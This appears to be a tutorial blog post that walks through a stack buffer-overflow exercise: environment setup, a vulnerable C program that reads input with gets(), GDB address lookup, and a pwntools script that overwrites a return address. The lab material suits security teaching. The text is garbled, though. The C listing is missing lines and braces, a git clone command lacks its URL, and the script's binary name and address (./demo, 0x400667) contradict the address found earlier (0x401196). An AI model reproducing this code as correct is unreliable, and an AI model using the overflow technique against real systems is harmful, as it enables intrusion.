
Buffer Overflow Vulnerability is one of the most common and severe security vulnerabilities in the field of software and system security. In the complex software systems of today’s digital age, the threat from hackers or malicious users is ever-present. Buffer Overflow Vulnerability is one of the most concerning threats among them due to the significant threat it poses to computer systems.

In simple terms, a buffer overflow vulnerability occurs when code attempts to store data in a predefined size of memory block known as a buffer. If the amount of data input exceeds the maximum capacity of the buffer, the excess data will overflow into adjacent memory areas, potentially overwriting instructions or data that control program execution, leading to unexpected behavior.

The fundamental cause of buffer overflow vulnerabilities is negligence and errors in program design. When developers fail to handle user input correctly, especially when they do not perform sufficient validation and restrictions on the input, it may lead to such vulnerabilities. Attackers often exploit these unchecked inputs by sending specially crafted malicious data, triggering buffer overflow attacks. This attack method has been around for many years and has caused numerous serious security incidents throughout history.

In the past, several well-known buffer overflow vulnerabilities have been widely reported, some of which have had profound impacts on global information security. For example, the infamous Code Red and Nimda worms utilized buffer overflow vulnerabilities to rapidly infect tens of thousands of hosts. Similarly, the Slammer worm exploited a buffer overflow vulnerability in Microsoft SQL Server, causing a sudden surge in global internet traffic. These events emphasize the need for the entire tech industry to take buffer overflow vulnerabilities seriously.

SQL Slammer -

So, this article aims to conduct a simple experiment on buffer overflow vulnerabilities to provide at least a conceptual understanding.

Environment Setup

In terms of environment setup, we use the Windows Subsystem for Linux (WSL) platform to configure the development environment and use Ubuntu 20.04 LTS as the development environment. We will install the necessary tools in this environment, including Python3, Pwntool, and the PEDA plugin for GDB debugging.

WSL provides a feature to run Linux distributions on Windows systems, enabling us to perform Linux-related development work in a Windows environment. Ubuntu 20.04 LTS is a stable and common Linux distribution widely used in development and testing environments.

Before configuring the environment, we need to ensure that WSL is installed and running. Installation instructions for WSL can be found in the Microsoft official documentation or relevant online tutorials.

Next, we need to install Python3 and Pwntool in WSL. Pwntool is a common Python library used in CTFs, specifically designed for exploit development.

Before installing Pwntool, we need to make sure that git is installed in WSL. If not installed, it can be done using the following commands:

sudo apt update
sudo apt install git

Next, we can install Pwntool as follows:

sudo apt install python3 python3-pip
pip3 install --upgrade pip
pip3 install pwntools

Now we have completed the installation of Python3 and Pwntool in WSL.

Finally, we will configure the GDB DEBUG environment, using the PEDA plugin to assist us in practicing buffer overflow vulnerabilities.

git clone ~/peda
echo "source ~/peda/" >> ~/.gdbinit

Lastly, here is a simple C program buffer_test.c used as the target for demonstrating the buffer overflow vulnerability. The program includes a uname() function that uses the gets() function to receive user input, but it does not perform sufficient validation on the input, potentially leading to a buffer overflow vulnerability.


#include <stdio.h>
void target(){
printf("Oh No! Your Hacker.\n");
void uname(){
char str[16];
printf("input your name: \n");
printf("Hello, %s \n", str);
int main(){
setvbuf(stdin, NULL, _IONBF, 0); //Clear buffer
setvbuf(stdout, NULL, _IONBF, 0);
return 0;

The program contains the risky input function gets, used for practicing Buffer Overflow.

Experimental Steps

Compile the Program

First, we need to compile the code named buffer_test.c for further experimentation. During compilation, we need to disable the Stack Canary protection mechanism using the following command:

gcc buffer_test.c -o buffer_test -fno-stack-protector -no-pie

-fno-stack-protector : Disable the Stack Canary protection mechanism.

Check Protective Measures

Before starting the experiment, it is necessary to confirm the security protective measures of the target program. The checksec command can quickly check the relevant security measures of the target executable:

checksec buffer_test

Confirm the Target

Before launching an attack, we need to identify the target. In this experiment, our goal is to execute the target function, so we need to find the memory address of that function and overwrite the function’s return address.

Confirm Function Memory Address

Use GDB to query the memory address of the target function:

gdb buffer_test
gdb-peda$ disas target

From the above image, the starting address of this function is 0x0000000000401196 . Knowing the address of the function, the next step is to understand how to overwrite the ret address from input.


Before launching an actual attack, let’s run the program in GDB and observe its behavior:

gdb-peta$ r    // Run it first

The program will prompt the user to input a name, and after entering the name, it responds with "Hello, {name}". Since the array in the original program that holds user input is only 16 bytes (RBP ~ RBP-16), we can observe its behavior by inputting data exceeding 16 bytes.


As shown in the image, when input exceeds 24 bytes, a buffer overflow occurs, and a crash occurs after the v character. This indicates that we need at least 24 bytes of input to successfully overwrite the function’s return address.

So, it can be covered with 8 Bytes to overwrite the ret address.

RBP shows only up to ‘qrstuvwx’, meaning it crashed when input reached 24 bytes.

Actual Overwriting with Python

為了進行實際的攻擊,將使用 Python 撰寫攻擊腳本。這個腳本將使用 Pwntools 函式庫來進行攻擊,蓋過程式中的函式返回位址,使之執行 target 函式。

To carry out the actual attack, a Python script will be used to overwrite the program’s function return address. This script will use the Pwntools library to perform the attack and execute the target function.

The attack script is as follows:

#!/usr/bin/env python
# coding=utf-8
from pwn import *
r = process('./demo')
r.recvuntil('input your name:')
targer_address = p64(0x400667)
r.sendline(b'A' * 24 + targer_address)

In the attack script, the process() function is used to execute the buffer_test program. Then, the recvuntil() function is used to wait for the program to display the prompt “input your name:”, after which the pre-calculated address of the target function is added to the input data. Finally, the interactive() function is used to enter interactive mode to observe the results of the attack.

  • recvuntil(): receive until, can receive a specific string, and execute the xx command when the target string is reached.

  • p8()p32()p64()

    • p32: pack data (32-bit integer) for data // u32: unpack
    • p64: pack data (64-bit integer) for data // u64: unpack

Convert to address

  • sendline(payload): send payload and newline
  • interactive(): enter interactive mode, used to execute local or remote executables

Execute the Attack Script

Finally, we run the attack script to perform the attack:


After a successful attack, the program will execute the target function and display the message “Oh No! Your Hacker.” This proves that we have successfully exploited the buffer overflow vulnerability.

Successfully executed the target function!

Remember to ensure compliance with relevant laws and regulations when applying the knowledge gained in real-world environments, and only conduct security testing and exploitation in legally authorized situations.
